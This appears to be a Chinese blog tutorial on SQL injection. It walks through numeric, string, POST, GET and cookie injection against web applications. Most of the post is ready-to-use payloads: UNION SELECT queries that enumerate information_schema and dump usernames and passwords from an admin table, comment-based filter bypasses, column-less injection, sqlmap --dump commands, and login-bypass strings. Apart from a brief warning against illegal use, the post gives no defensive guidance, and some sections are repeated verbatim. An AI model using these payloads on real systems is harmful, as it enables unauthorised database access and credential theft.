SQL注入介绍

已于 2022-02-16 14:50:51 修改
阅读量832 收藏 4
点赞数 1
分类专栏: 渗透测试 文章标签: sql 数据库
于 2021-12-18 09:40:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WEARE001/article/details/122008536
版权

前言

本篇文章介绍了sql注入的常见注入类型及方法!
注:切勿做违法乱纪之事,后果自行承担!!!!

正文

1 按变量类型

1.1 数字型

information_schema为MySQL自带数据库,所有数据库名、表名、字段名都可以从中查询到!

1)判断注入

.1’ and 1=‘1# 用and连接,若查询1结果正确,返回值为真
.1’ and 1=‘2# 用and连接,若查询1结果正确,返回值为假

#双引号注入

.1’’ and 1=’‘1# 用and连接,若查询1结果正确,返回值为真
.1’’ and 1=’'2# 用and连接,若查询1结果正确,返回值为假

#数字型注入

.1 and 1=1 用and连接,若查询1结果正确,返回值为真
.1 and 1=2 用and连接,若查询1结果正确,返回值为假

2)判断字段数 地址栏输入 ’ order by 数字

‘ order by (1,2,3,4........) --+   //可判断出有几个回显

?id=-1' union select 1,database(),3 --+  //可判断出数据库名字,假设order by 4出错,变量改为-1

id=-1' union select 1,1,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata)'   另一种查询方式,后同

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘数据库名字’ --+   //查表明   group_concat多个表有序排列(引号一定要)

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘输入要查询的表名’     //查询表中的字段

?id=-1' union select 1,要查询的字段名1,要查询的字段名2 from 要查询的表    //查询一年字段中的内容

?id=-1' union select 1,unhex(hex(username)),unhex(hex(password)),4 from admin  //若内容无法显示,则unhex编码

情况一

查表名时由于过滤or,所以information_schema无法使用。 但Mysql5.6及以上版本中
innodb_index_stats 和innodb_table_stats这两个表中都包含所有新创建的数据库和表名

PS://可以代替空格 不能用order by测试列数,用group by代替
注释符#用,'3代替,数字随便**

查看表名:
-1’union//select//1,(select//group_concat(table_name)//from/**/mysql.innodb_table_stats),3,‘3

这时就要无列名注入了
因为没有mysql.innodb_column_stats这个方法,查不了列名
大概原理就是没有列名,那就给它取名,然后按别名正常继续注入

//-1’//union//select//1,(select//group_concat(b)//from//(select//1,2,3//as//b//union//select//*//from//users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

————————————————————————————————————————————

1.2 字符型

' and '1'='1
' and '1'='2

剩下步骤和数字型一样…

2 按HTTP提交方式

2.1 POST型注入

简单说明步骤:

1.直接burpsuite抓取数据包
2.sql跑起来——

sqlmap.py -r "数据包文件" --current-db   #查询当前数据库名字
-----------------------------------------------------------
--current-db       //表示当前网站的数据库名字
--tables -D  “当前数据库名字”      //当前网站数据库名字
--columns -T -D   //获取表中的列
--dump -C -T -D   ///获取列中的字段内容

sql注入万能用户名
注释法 //将密码注释掉

eg:用户名处 admin' #
or 方法	
eg:admin' or '1'='1

2.2 GET型注入

简单说明步骤:

1.sql跑起来——
sqlmap.py -u “URL”

--current-db       //表示当前网站的数据库名字
--tables -D  “当前数据库名字”      //当前网站数据库名字
--columns -T -D   //获取表中的列
 --dump -C -T -D   ///获取列中的字段内容

2.3 Cookie型注入

怎样cookie注入?
  cookie注入分为以下几个阶段:

  1. 判断是不是注入点
    2.得到字段总数
    3.查选表名
    4.查选列名
    5.脱裤(就是得到我们想得到列名的值)

我们先理解一下这几个概念:

javascript:alert(document.cookie=“id=”+escape(“284”))

	document.cookie:表示当前浏览器中的cookie变量

  alert():表示弹出一个对话框,在该对话框中单击“确定”按钮确认信息。

  escape():该函数用于对字符串进行编码。

  cookie注入的原理在于更改本地的cookie,从而利用cookie来提交非法语句。

  cookie注入原理

【检测方法】

1、首先找到传参地址: asp?id=xxx(例如:http://www.example.com/news.asp?id=1)
2、去掉参数,访问该url
http://www.example.com/news.asp?
如果页面访问不正常,则说明该参数id是访问页面所必需的的参数,可以尝试继续注入。
3、记录并清空当前浏览器地址栏中的地址,在其中输入
javascript:alert(document.cookie=“id=”+escape(“xxx”));
//这里的xxx就是上一步中id=xxx中的参数值
4、再浏览器地址栏中输入原来的url地址(注意,这里输入的是不带参数值的url,如下):
http://www.example.com/news.asp?
按下回车,访问该url,如果发现页面正常显示了,到此可以证明,我们正在接受的页面存在request方法获取参数,可能存在cookie注入的风险

【利用方法】:
手工检测到可能存在cookie注入时,我们就可以通过常规注入方法来进行注入了

1、清空地址栏,输入我们的写cookie代码:
javascript:alert(document.cookie=“id=”+escape(“xxx and 1=1”));
2、使用无参数的url地址访问
http://www.example.com/news.asp?
如果页面正常,我们就可以进行下一步检测。如果这是页面不正常,说明站点管理员已经部署了响应的防御策略,就需要找其他方法注入
3、清空地址,同样的方法写入新的cookie
javascript:alert(document.cookie=“id=”+escape(“xxx and 1=2”));
如果上一次页面正常,这次页面不正常,那么说明存在cookie注入漏洞,可以通过常规方法注入即可,只是cookie注入相对比较麻烦,需要每一次都在浏览器中执行写cookie代码
javascript:alert(document.cookie=“id=”+escape(“xxx 注入语句”));
然后访问不带参数的url地址
http://www.example.com/news.asp?
根据页面提示进行注入即可

3 union联合查询(有回显)

注意:判断是除了在id=1后面加引号,还可以加引号加单括号,等等…

如:
id=1'
id=1')  and '1'='1'       and '1'='2'
id=1"
id=1")  and '1'='1'       and '1'='2'

PS://可以代替空格 不能用order by测试列数,用group by代替
注释符#用,'3代替,数字随便**

前面+URL

and 1=1
and 1=2
’ and ‘1’='1
’ and ‘1’='2

‘ order by (1234........--+   //可判断出有几个回显

?id=-1' union select 1,database(),3 --+  //可判断出数据库名字,假设order by 4出错,变量改为-1

id=-1' union select 1,1,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata)'   另一种查询方式,后同

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where 
table_schema=‘数据库名字’ --+   //查表明   group_concat多个表有序排列(引号一定要)

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘输入要查询的表名’     //查询表中的字段

?id=-1' union select 1,要查询的字段名1,要查询的字段名2 from 要查询的表    //查询一年字段中的内容

?id=-1' union select 1,unhex(hex(username)),unhex(hex(password)),4 from admin  //若内容无法显示,则unhex编码

情况一
查表名时由于过滤or,所以information_schema无法使用。
但Mysql5.6及以上版本中 innodb_index_stats 和innodb_table_stats这两个表中都包含所有新创建的数据库和表名

PS://可以代替空格 不能用order by测试列数,用group by代替
注释符#用,'3代替,数字随便**

查看表名:

-1'union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),3,‘3

这时就要无列名注入了
因为没有mysql.innodb_column_stats这个方法,查不了列名
大概原理就是没有列名,那就给它取名,然后按别名正常继续注入

//-1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

总结

更多分享微信搜索“安全info”公众号
添加群主进“安全交流”微信群
在这里插入图片描述

流浪法师12
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sql注入详解
m0_67392811的博客
06-12 5778
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
SQL注入介绍与原理分析
03-28
SQL注入是一种常见的网络安全威胁,它主要针对使用SQL(结构化查询语言)的数据库管理系统。攻击者通过在输入字段中插入恶意的SQL代码,试图绕过应用程序的安全控制,从而获取未授权的数据、修改数据、甚至完全控制...
CTF从零到一 SQL注入-1
shirazawah的博客
09-14 1913
看到id=1 首先要判断是字符型还是数字型注入 根据书上方法判断数字型 id=3-2 返回页面与id=1的页面不同,说明不是数字型 加入单引号判断是否为字符型 id=1%27(这里'被转译成%27) 没有任何返回,说明有错误,存在注入。 接下来使用order by 判断表的列数。 id=1' order by 3 --+ (空格为%20 --+注释后面的语句) 显示正常 id=1' order by 4 --+ 说明一共有三列 接着我们使用un...
SQL注入详解(主要针对MySQL)
Rockboy777的博客
08-09 463
权限不足时也受影响;join绕过,如:union select 1,2,3 -> union select from (select 1)a join (select 2) join (select 3)substr()和mid()使用from for,如substr(database() from 1 for 1)表示将字符串从1位置截取长度1,mid()同理。
SQL注入介绍_sql注入id=-1含义(1)
最新发布
2401_84281720的博客
05-17 1092
id=-1’ union select 1,要查询的字段名1,要查询的字段名2 from 要查询的表 //查询一年字段中的内容?id=-1’ union select 1,unhex(hex(username)),unhex(hex(password)),4 from admin //若内容无法显示,则unhex编码。
sql注入,关于id=‘1 and 1=1‘
m0_55306747的博客
11-25 1万+
在做sql-labs靶场时,学到了,这个知识点很重要,当时发现这个问题困惑了我许久 正常的注入语句:select * from users where id = 1 select * from users where id = '1'也可以查询出和语句一相同的结果 select * from users where id = '$id' 令id=1" 语句变为select * from users where id = '1"' 此时引号正常闭合,按理说应当是查询users表中,id为1"的所有
SQL注入 (1)
qq_39527920的博客
08-12 1213
第一步:测试是否存在注入点,用and语句测试。 http://120.203.13.75:6815/?id=1 and 1=1  http://120.203.13.75:6815/?id=1 and 1=2 一网址可以正常显示,二网址则无法显示,所以推断有注入点。 第二步:猜测字段 http://120.203.13.75:6815/?id=1 order by 2 http:...
dvwa之SQL注入(1)
Lethe's Blog
02-23 1576
一、Low SQL Injection 1.sql语句 //low等级源码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name ...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
sql注入网站源码
04-09
SQL注入是一种常见的网络安全漏洞,主要出现在使用动态SQL语句构建数据库查询的应用程序中。这个"sql注入网站源码"提供了一个具有SQL注入漏洞的ASP(Active Server Pages)网站实例,对于学习如何检测、防范和修复这...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
SQLi-LABS(1~10关详解)
CTF小白的博客
09-22 6421
目录SQLi-LABS Less-1查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-2查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-3查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-4查看题目环境测试...
SQL注入系列之ASP+ACCESS手动注入(一)----数字型
热门推荐
fendo
12-30 2万+
一、access数据库 1.简介 Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 MicrosoftJet Database Engine 和 图形用户界面两项特点,是 Microsoft Office 的系统程序之一。 Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发工具结合在一起的一
SQL注入非常详细总结
dreamthe的博客
05-25 1万+
个人觉得还是很详细,对你一定帮助。也是我自己花了不少时间总结的。
StringEscapeUtils
天道酬勤
01-16 2360
org.apache.commons.lang.StringEscapeUtils 类可以对js sql html xml等代码进行转义!用来处理前端js注入代码 SQL特殊字符转义   应该说,您即使没有处理 HTML 或 JavaScript 的特殊字符,也不会带来灾难性的后果,但是如果不在动态构造 SQL 语句时对变量中特殊字符进行处理,将可能导致程序漏洞、数据盗取、数据破坏等严重的安...
oracle 主键 hash,oracle之SQL_ID 1
weixin_30914901的博客
04-03 214
在Oralce里,一个sql语句执行时会生成很多信息:SQL唯一标识SQL文本信息绑定变量信息执行计划和游标信息统计信息性能信息其他信息.例如sql来源,状态等SQL_ID在Oracle中,SQL优化器是负责解析sql的(包括直接执行的sql和存储过程中的sql),中的sql在提交sql优化器解析前,会进行一些预处理,包括大小写,空格,注释的处理等。在解析sql时,sql优化器会分配一个ID(子游...
高级SQL注入:混淆和绕过
kezhen的专栏
08-11 1900
#############  【0×00】 – 简介  【0×01】 – 过滤规避(Mysql)  【0x01a】 – 绕过函数和关键词的过滤  【0x01b】 – 绕过正则表达式过滤  【0×02】 – 常见绕过技术  【0×03】 – 高级绕过技术  【0x03a】 – HTTP参数污染:分离与结合  【0x03b】 – HTTP参数参杂  【0×04】 – 如何保护你的
介绍一下sql注入攻击
06-08
SQL注入攻击是一种常见的Web应用程序攻击技术,攻击者通过在Web应用程序中插入恶意的SQL语句来执行非授权的操作。攻击者可以通过SQL注入攻击获取敏感信息、修改数据库数据、执行任意代码等操作。 SQL注入攻击通常利用Web应用程序没有正确过滤和验证用户输入的数据。攻击者会在Web应用程序中输入一些恶意的SQL语句,这些语句会被解释为合法的SQL查询并被执行,从而导致安全漏洞。 SQL注入攻击可以分为以下几种类型: 1. 基于错误的注入攻击:攻击者尝试通过输入恶意数据来引发Web应用程序的错误信息,从而找到漏洞。 2. 基于时间的注入攻击:攻击者修改SQL查询语句,使其需要更长的时间才能执行,从而推断出数据库的结构和数据。 3. 盲注注入攻击:攻击者无法直接获取数据库的信息,但可以通过推断出正确或错误的查询结果来推断出数据库的结构和数据。 为了防止SQL注入攻击,开发人员应该使用参数化查询、输入验证、过滤器和安全编码等技术来保护Web应用程序。此外,还可以使用工具如Web应用程序防火墙(WAF)来检测和阻止SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

流浪法师12

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值